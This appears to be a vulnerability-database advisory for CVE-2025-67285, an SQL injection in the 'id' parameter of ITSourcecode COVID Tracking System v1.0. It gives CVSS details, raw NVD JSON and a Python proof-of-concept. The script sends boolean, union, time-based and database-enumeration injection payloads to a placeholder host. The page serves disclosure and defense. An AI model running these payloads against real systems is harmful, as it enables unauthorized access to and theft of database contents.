Security Vulnerability Report
CVE-2025-67285 (CVSS 7.3 HIGH)

Published: 2025-12-17 17:15:51
Last Modified: 2026-01-02 17:46:54

Description

A SQL injection vulnerability was found in the '/cts/admin/?page=zone' file of ITSourcecode COVID Tracking System Using QR-Code v1.0. The root cause is that the value of the 'id' parameter is used directly in SQL queries without appropriate sanitization or validation, so an attacker can inject malicious SQL through that parameter.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Weakness: CWE-89 (SQL Injection)

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:covid_tracking_system_using_qr-code:1.0:*:*:*:*:*:*:* - VULNERABLE
ITSourcecode COVID Tracking System Using QR-Code v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67285 SQL Injection PoC
# Target: ITSourcecode COVID Tracking System Using QR-Code v1.0
# Endpoint: /cts/admin/?page=zone
# Parameter: id
import requests
import sys

target = "http://target.com/cts/admin/?page=zone"

# Basic SQL Injection Test - Boolean Based
print("[*] Testing CVE-2025-67285 SQL Injection...")

# Normal Request
normal_payload = {"id": "1"}
response_normal = requests.get(target, params=normal_payload)
print(f"[+] Normal Request Status: {response_normal.status_code}")

# SQL Injection Payloads
payloads = [
    "1' OR '1'='1",             # Basic Authentication Bypass
    "1' UNION SELECT 1,2,3--",  # Union-based Injection
    "1' AND SLEEP(5)--",        # Time-based Blind Injection
    "1' AND 1=1--",             # Boolean Test - True
    "1' AND 1=2--",             # Boolean Test - False
]

for payload in payloads:
    print(f"\n[*] Testing Payload: {payload}")
    params = {"id": payload}
    try:
        response = requests.get(target, params=params, timeout=10)
        print(f"[+] Response Length: {len(response.text)}")
        print(f"[+] Status Code: {response.status_code}")
        if len(response.text) != len(response_normal.text):
            print("[!] Potential vulnerability detected!")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

# Database Enumeration Payload (if vulnerable)
print("\n[*] Attempting Database Enumeration...")
enum_payload = "1' UNION SELECT NULL,version(),user(),database()--"
params = {"id": enum_payload}
response = requests.get(target, params=params)
print(f"[+] Enumeration Response Length: {len(response.text)}")

print("\n[*] PoC Complete. Manual verification required.")

References

https://github.com/bardminx/Lonlydance/issues/1 (Exploit, Issue Tracking, Third Party Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-67285",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-17T17:15:51.137",
    "lastModified": "2026-01-02T17:46:53.753",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A SQL injection vulnerability was found in the '/cts/admin/?page=zone' file of ITSourcecode COVID Tracking System Using QR-Code v1.0. The reason for this issue is that attackers inject malicious code from the parameter 'id' and use it directly in SQL queries without the need for appropriate cleaning or validation."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:angeljudesuarez:covid_tracking_system_using_qr-code:1.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "22188B0F-745F-4A0C-8D0B-08A042B41067"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/bardminx/Lonlydance/issues/1",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Issue Tracking",
          "Third Party Advisory"
        ]
      }
    ]
  }
}